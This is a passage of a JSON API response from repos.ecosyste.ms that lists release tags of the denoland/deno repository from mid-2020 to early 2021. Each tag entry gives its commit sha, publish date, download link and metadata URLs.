"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/